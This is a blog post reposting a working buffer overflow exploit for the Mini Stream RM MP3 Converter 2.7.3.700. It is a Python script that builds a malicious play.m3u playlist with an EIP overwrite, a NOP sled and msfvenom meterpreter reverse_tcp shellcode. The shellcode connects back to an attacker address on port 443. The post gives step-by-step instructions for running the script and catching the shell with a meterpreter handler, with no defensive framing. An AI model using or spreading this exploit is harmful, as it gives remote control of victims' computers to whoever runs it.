Thursday, 1 June 2017

Mini Stream RM MP3 2.7.3.700 Buffer Overflow

Standard
# Exploit Title: Mini Stream RM MP3 2.7.3.700 Buffer Overflow
# Date: 31.05.2017
# Exploit Author: Dibyendu Sikdar (dibsyhex)
# Vendor Homepage: http://www.downloadsource.net/5318/Mini-stream-RM-MP3-Converter-Easy-RM-to-MP3-Converter/
# Software Link: https://www.exploit-db.com/apps/1bbf03ec57b1ad30970362518e073215-Mini-streamRM-MP3Converter.exe
# Version: 2.7.3.700
# Tested on: Windows 7 Home Basic 32 bit

# Save the file as exploit.py
# Run the code as python exploit.py
# It will create a file with the exploit called play.m3u
# Run a meterpreter handler in attacker system
# Start the application. Select load. Select filetype as playlist. Open the play.m3u file

#EIP = 1001B058  [ using PUSH ESP, RETN ]

head = "A" * 35055
nop = "\x90" * 60
eip = "\x58\xB0\x01\x10"

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.30.130 LPORT=443 -f c -b "\x00\x0a\x0d"

shell = ("\xd9\xc0\xd9\x74\x24\xf4\x5f\xb8\xad\xaf\xba\x08\x31\xc9\xb1"
"\x54\x31\x47\x18\x03\x47\x18\x83\xef\x51\x4d\x4f\xf4\x41\x10"
"\xb0\x05\x91\x75\x38\xe0\xa0\xb5\x5e\x60\x92\x05\x14\x24\x1e"
"\xed\x78\xdd\x95\x83\x54\xd2\x1e\x29\x83\xdd\x9f\x02\xf7\x7c"
"\x23\x59\x24\x5f\x1a\x92\x39\x9e\x5b\xcf\xb0\xf2\x34\x9b\x67"
"\xe3\x31\xd1\xbb\x88\x09\xf7\xbb\x6d\xd9\xf6\xea\x23\x52\xa1"
"\x2c\xc5\xb7\xd9\x64\xdd\xd4\xe4\x3f\x56\x2e\x92\xc1\xbe\x7f"
"\x5b\x6d\xff\xb0\xae\x6f\xc7\x76\x51\x1a\x31\x85\xec\x1d\x86"
"\xf4\x2a\xab\x1d\x5e\xb8\x0b\xfa\x5f\x6d\xcd\x89\x53\xda\x99"
"\xd6\x77\xdd\x4e\x6d\x83\x56\x71\xa2\x02\x2c\x56\x66\x4f\xf6"
"\xf7\x3f\x35\x59\x07\x5f\x96\x06\xad\x2b\x3a\x52\xdc\x71\x52"
"\x97\xed\x89\xa2\xbf\x66\xf9\x90\x60\xdd\x95\x98\xe9\xfb\x62"
"\xdf\xc3\xbc\xfd\x1e\xec\xbc\xd4\xe4\xb8\xec\x4e\xcd\xc0\x66"
"\x8f\xf2\x14\x12\x8a\x64\x57\x4b\x8a\xf6\x3f\x8e\xb3\xf7\x04"
"\x07\x55\xa7\x2a\x48\xca\x07\x9b\x28\xba\xef\xf1\xa6\xe5\x0f"
"\xfa\x6c\x8e\xa5\x15\xd9\xe6\x51\x8f\x40\x7c\xc0\x50\x5f\xf8"
"\xc2\xdb\x6a\xfc\x8c\x2b\x1e\xee\xf8\x4d\xe0\xee\xf8\xe7\xe0"
"\x84\xfc\xa1\xb7\x30\xfe\x94\xf0\x9e\x01\xf3\x82\xd9\xfd\x82"
"\xb2\x92\xcb\x10\xfb\xcc\x33\xf5\xfb\x0c\x65\x9f\xfb\x64\xd1"
"\xfb\xaf\x91\x1e\xd6\xc3\x09\x8a\xd9\xb5\xfe\x1d\xb2\x3b\xd8"
"\x69\x1d\xc3\x0f\xea\x5a\x3b\xcd\xce\xc2\x54\x2d\x4e\xf3\xa4"
"\x47\x4e\xa3\xcc\x9c\x61\x4c\x3d\x5c\xa8\x05\x55\xd7\x3c\xe7"
"\xc4\xe8\x15\xa9\x58\xe8\x99\x72\x8c\x67\x5e\x85\xb1\x89\x63"
"\x53\x88\xff\xa4\x67\xaf\xf0\x9f\xca\x86\x9a\xdf\x59\xd8\x8e")

f = open("play.m3u","w")
payload = head+eip+nop+shell+"C"*200
f.write(payload)
f.close()



0 comments:

Post a Comment